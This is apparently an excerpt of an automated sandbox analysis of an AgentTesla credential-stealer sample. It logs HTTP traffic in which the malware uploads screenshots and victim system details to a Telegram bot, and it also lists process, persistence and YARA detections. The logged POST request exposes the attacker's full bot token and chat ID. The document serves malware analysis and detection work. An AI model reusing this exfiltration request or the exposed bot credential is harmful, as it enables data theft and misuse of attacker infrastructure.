2024-12-06 04:54:55 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 65 62 36 64 34 65 33 31 38 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 65 62 36 64 34 65 33 31 38 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 31 38 2f 32 30 32 35 20 32 30 3a 32 33 3a 30 37 0a 55 73 65 72 Data Ascii: -----------------------------8dd7eb6d4e31816Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd7eb6d4e31816Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/18/2025 20:23:07User
2024-12-06 04:54:55 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:54:55 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:54:55 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:54:55 UTC	15447	OUT	Data Raw: 45 dd 65 2a 0e f6 1c 60 1e c7 de b1 ad 55 51 8f 33 47 4e 1b 0e f1 13 70 4e da 5c e7 e8 ae d3 fb 03 4b ff 00 9f 63 ff 00 7f 5f fc 68 fe c0 d2 ff 00 e7 d8 ff 00 df d7 ff 00 1a e5 fa fc 7b 1d ff 00 d9 33 fe 64 71 74 56 8e a1 a5 c9 6f 13 dd 42 0b 5b f9 b2 29 1d 4c 78 72 07 e1 c7 5a ce ae aa 55 a3 56 37 89 e7 e2 30 f3 c3 cb 96 41 45 14 56 c7 38 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 52 52 d2 50 30 a2 8a 28 00 a2 8a 28 01 28 a2 8a 00 28 a2 8a 00 28 a2 8a 06 14 94 51 40 05 14 51 4c 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 30 a2 8a 28 01 28 a2 8a 00 28 a2 8a 06 14 86 97 b5 25 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 51 4c 61 45 14 50 02 51 46 69 33 40 c5 a4 a4 a2 80 b0 67 da 93 34 51 40 Data Ascii: Ee*`UQ3GNpN\Kc_h{3dqtVoB[)LxrZUV70AEV8QEQEQEQERRP0(((((Q@QL(((RRPEP0(((%QE%Q@(ZJQEQLaEPQFi3@g4Q@
2024-12-06 04:54:55 UTC	1505	OUT	Data Raw: e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 47 3f fc 7b c9 fe e9 fe 54 79 f0 ff 00 cf 54 ff 00 be 85 32 69 a2 30 48 04 88 49 53 fc 43 d2 80 3e 7d a2 8a 2b 53 03 6f 4c f1 24 f6 76 3f 60 b9 b5 82 fe cf 3b 96 1b 85 c8 53 ea 0f 6f c2 8d 4f c4 93 de 58 fd 82 da d6 0b 0b 3c ee 68 6d d7 01 8f a9 3d ff 00 1a c4 a4 a2 c1 70 a2 8a 29 80 51 45 14 01 af 73 e2 7d 72 e2 ea 59 ff 00 b5 6f 22 f3 1c bf 97 15 c3 aa 2e 4e 70 a3 3c 01 da a3 97 5c be 9e 78 67 b8 93 cf 9a 2b 69 2d bc c9 4b 33 32 b8 70 49 24 f2 40 90 e3 e8 2b 32 8a 41 70 a2 8a 28 00 a2 8a 29 81 d7 4d e3 18 ae 63 89 25 b4 78 fc b5 c0 2a c1 b3 fc b1 d2 a4 9b c6 d0 cf 17 94 da 69 88 1e ae b2 06 Data Ascii: Q=S%OQ=S%OQ=S%G?{TyT2i0HISC>}+SoL$v?`;SoOX<hm=p)QEs}rYo".Np<\xg+i-K32pI$@+2Ap()Mc%x*i
2024-12-06 04:54:55 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 65 62 36 64 34 65 33 31 38 31 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd7eb6d4e31816--
2024-12-06 04:54:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:54:56 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:54:56 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170421,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460896,"document":{"file_name":"user-610930 2025-04-18 20-23-07.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZtWdSg5-80lPXypwJDP2Wd4fzYCuoAAL_FAACOh6ZUuvs3n6PKtm2AQAHbQADNgQ","file_unique_id":"AQAD_xQAAjoemVJy","file_size":12304,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZtWdSg5-80lPXypwJDP2Wd4fzYCuoAAL_FAACOh6ZUuvs3n6PKtm2AQAHbQADNgQ","file_unique_id":"AQAD_xQAAjoemVJy","file_size":12304,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmbVnUoOfvNJT18qcCQz9lneH82ArqAAC_xQAAjoemVLr7N5-jyrZtjYE","file_unique_id":"AgAD_xQAAjoemVI","file_size":66470},"caption":"New SC Recovered!\n\nTime: 04/18/2025 20:23:07\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50036	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:55:00 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd821a08413a24 Host: api.telegram.org Content-Length: 66944 Expect: 100-continue
2024-12-06 04:55:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:55:02 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 38 32 31 61 30 38 34 31 33 61 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 38 32 31 61 30 38 34 31 33 61 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 33 2f 32 30 32 35 20 30 33 3a 33 30 3a 34 37 0a 55 73 65 72 Data Ascii: -----------------------------8dd821a08413a24Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd821a08413a24Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/23/2025 03:30:47User
2024-12-06 04:55:02 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:55:02 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:55:02 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:55:02 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:55:02 UTC	1358	OUT	Data Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4 Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?ImyM c`:h(%mX:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
2024-12-06 04:55:02 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 38 32 31 61 30 38 34 31 33 61 32 34 2d 2d 0d 0a Data Ascii: -----------------------------8dd821a08413a24--
2024-12-06 04:55:03 UTC	1504	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:55:02 GMT Content-Type: application/json Content-Length: 1115 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170425,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460902,"document":{"file_name":"user-610930 2025-04-23 03-50-47.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZuWdSg6a8oPm4UZdvXl3HiFo8XBbeAAMVAAI6HplSgdPLuq-AYIYBAAdtAAM2BA","file_unique_id":"AQAEFQACOh6ZUnI","file_size":12290,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZuWdSg6a8oPm4UZdvXl3HiFo8XBbeAAMVAAI6HplSgdPLuq-AYIYBAAdtAAM2BA","file_unique_id":"AQAEFQACOh6ZUnI","file_size":12290,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmblnUoOmvKD5uFGXb15dx4haPFwW3gADFQACOh6ZUoHTy7qvgGCGNgQ","file_unique_id":"AgAEFQACOh6ZUg","file_size":66323},"caption":"New SC Recovered!\n\nTime: 04/23/2025 03:30:47\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 M [TRUNCATED]

Target ID:	0
Start time:	23:50:53
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\PO54782322024.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PO54782322024.exe"
Imagebase:	0x17f04180000
File size:	528'896 bytes
MD5 hash:	5DC11C53470282CA41404226EAD4ECCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:50:53
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:50:54
Start date:	05/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Imagebase:	0x660000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.4115057036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	23:50:54
Start date:	05/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6844 -s 1068
Imagebase:	0x7ff710010000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	23:51:07
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Imagebase:	0xda0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	23:51:07
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	23:51:15
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Imagebase:	0xb00000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	23:51:15
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	2

Executed Functions

Function 00007FFD9B950050 Relevance: 2.2, Instructions: 2250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1907444028.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b950000_PO54782322024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912779f1b0543304afdc7f8a0bd92b751144c0fe7c2cdc6806a5d4b7a1e046ae
Instruction ID: c97a2b6db3861d6c388df594f670558525db99f091a0e31ccf102a789002a162
Opcode Fuzzy Hash: 912779f1b0543304afdc7f8a0bd92b751144c0fe7c2cdc6806a5d4b7a1e046ae
Instruction Fuzzy Hash: DBE25D71A1F7C95FEB66CBA888755A47FA0EF53700F0A01FAD488CB1E3DA646946C341

Function 00007FFD9B872A2C Relevance: 1.7, Strings: 1, Instructions: 480
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fish, xrefs: 00007FFD9B872A80

Memory Dump Source

Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd

Similarity

API ID:
String ID: fish
API String ID: 0-1064584243
Opcode ID: 6e8f1c7db1c5d5dcb0223d55b0289c8f124a32b9f2bfbeabe790dba3c08c2cc7
Instruction ID: 31ac6bb3621b057aa88e1a77db2994fc6e098cb29fe66b60c291576df2737a21
Opcode Fuzzy Hash: 6e8f1c7db1c5d5dcb0223d55b0289c8f124a32b9f2bfbeabe790dba3c08c2cc7
Instruction Fuzzy Hash: 24D17C31B1EA4E0FE76DEF6888A557577E1EF9A314B0501BED48BC71E3DD24A8068381

Function 00007FFD9B87D34D Relevance: 1.6, Instructions: 1590
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

